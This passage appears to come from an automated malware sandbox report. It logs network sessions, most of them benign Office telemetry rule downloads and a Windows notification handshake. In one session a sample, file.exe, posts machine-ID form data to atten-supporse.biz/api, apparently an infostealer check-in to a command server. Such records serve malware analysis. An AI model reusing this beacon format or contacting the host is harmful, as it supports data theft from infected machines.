                                                                                                                                                                                    Content-Length: 3788
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                    ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                    x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184919Z-174f78459688l8rvhC1EWRtzr00000000d10000000000cu0
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:20 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    9192.168.2.64971713.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:19 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:19 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 408
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                    x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184919Z-174f7845968jrjrxhC1EWRmmrs00000010e000000000br7z
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:20 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    10192.168.2.64971813.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:19 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:19 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 2160
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                    x-ms-request-id: 6eac4bdd-a01e-006f-1c91-3f13cd000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184919Z-174f7845968l4kp6hC1EWRe88400000010ng000000004pb1
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:20 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    11192.168.2.64971613.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:19 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:20 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:19 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 2980
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                    x-ms-request-id: 0a3cdbcf-401e-0016-597f-3f53e0000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184919Z-174f78459685m244hC1EWRgp2c000000108g000000001em5
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:20 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.649720104.21.16.94431656C:\Users\user\Desktop\file.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:20 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=5KA9GPVA
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                    Host: atten-supporse.biz
                                                                                                                                                                                    2024-11-29 18:49:20 UTC1177OUTData Raw: 2d 2d 35 4b 41 39 47 50 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 43 36 44 39 43 43 35 32 30 45 31 37 32 32 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 35 4b 41 39 47 50 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 4b 41 39 47 50 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 35 4b 41 39 47 50 56 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                                                    Data Ascii: --5KA9GPVAContent-Disposition: form-data; name="hwid"F0C6D9CC520E1722EFA3D63B69E7CA14--5KA9GPVAContent-Disposition: form-data; name="pid"1--5KA9GPVAContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--5KA9GPVAContent-Di
                                                                                                                                                                                    2024-11-29 18:49:21 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:21 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: PHPSESSID=spsmincnchmle6vvqurfrtmmel; expires=Tue, 25-Mar-2025 12:36:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JCG5K3hnTXAKkrxWGFcdRLiN4wm4XrrIQ%2BxUqilNHXTsX%2FhR6x6ipyiqVjRC%2Bw0sGTOydzkJIWSI8Qtp1lUPifuYxlxZq31uKOTKetTly%2B6cLGF%2B7yBuSnKR4RGnilTsVuzbvpQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 8ea4c6f08865726f-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2126&min_rtt=1824&rtt_var=1288&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2086&delivery_rate=688192&cwnd=163&unsent_bytes=0&cid=6b9edeba1bcfd329&ts=1135&x=0"
                                                                                                                                                                                    2024-11-29 18:49:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                    Data Ascii: fok 8.46.123.228
                                                                                                                                                                                    2024-11-29 18:49:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    13192.168.2.64971920.198.119.143443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:21 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 63 45 4d 46 30 67 75 6a 5a 55 79 74 5a 51 4e 76 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 61 66 31 62 34 39 33 34 34 32 30 33 32 33 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: CNT 1 CON 305MS-CV: cEMF0gujZUytZQNv.1Context: 6baf1b4934420323
                                                                                                                                                                                    2024-11-29 18:49:21 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                    Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                    2024-11-29 18:49:21 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 63 45 4d 46 30 67 75 6a 5a 55 79 74 5a 51 4e 76 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 61 66 31 62 34 39 33 34 34 32 30 33 32 33 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 61 39 7a 2b 50 5a 4c 67 39 31 67 42 54 59 51 52 67 6c 6f 56 44 6d 62 79 38 54 4b 65 6d 74 74 79 32 6e 35 43 4a 35 63 2f 71 55 49 31 57 6a 4b 41 38 6f 43 33 58 49 77 50 53 51 47 62 42 47 4a 53 58 41 49 47 49 74 63 42 6f 63 7a 53 67 31 52 79 4b 31 49 62 50 2f 74 6a 62 30 50 6a 61 41 4f 76 4b 79 63 33 47 36 50 36 73 58 77 2f 47
                                                                                                                                                                                    Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: cEMF0gujZUytZQNv.2Context: 6baf1b4934420323<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAa9z+PZLg91gBTYQRgloVDmby8TKemtty2n5CJ5c/qUI1WjKA8oC3XIwPSQGbBGJSXAIGItcBoczSg1RyK1IbP/tjb0PjaAOvKyc3G6P6sXw/G
                                                                                                                                                                                    2024-11-29 18:49:21 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 63 45 4d 46 30 67 75 6a 5a 55 79 74 5a 51 4e 76 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 62 61 66 31 62 34 39 33 34 34 32 30 33 32 33 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                    Data Ascii: BND 3 CON\WNS 0 197MS-CV: cEMF0gujZUytZQNv.3Context: 6baf1b4934420323<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                    2024-11-29 18:49:21 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                    Data Ascii: 202 1 CON 58
                                                                                                                                                                                    2024-11-29 18:49:21 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 65 63 53 77 4b 61 78 76 6b 4b 62 70 4c 70 54 4b 66 41 4f 39 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                    Data Ascii: MS-CV: HecSwKaxvkKbpLpTKfAO9Q.0Payload parsing failed.


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    14192.168.2.64972313.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:21 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:22 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 471
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                    x-ms-request-id: 5505dc9c-501e-00a3-721c-41c0f2000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184922Z-174f7845968pght8hC1EWRyvxg00000003e000000000cphc
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:22 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    15192.168.2.64972213.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:21 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:22 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 415
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                    ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                    x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184922Z-174f7845968pf68xhC1EWRr4h800000010pg000000001w84
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    2024-11-29 18:49:22 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    16192.168.2.64972413.107.246.63443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-11-29 18:49:21 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                    2024-11-29 18:49:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 29 Nov 2024 18:49:22 GMT
                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                    Content-Length: 632
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                    ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                    x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                    x-azure-ref: 20241129T184922Z-174f784596886s2bhC1EWR743w00000010d0000000006n17
                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                    Accept-Ranges: bytes
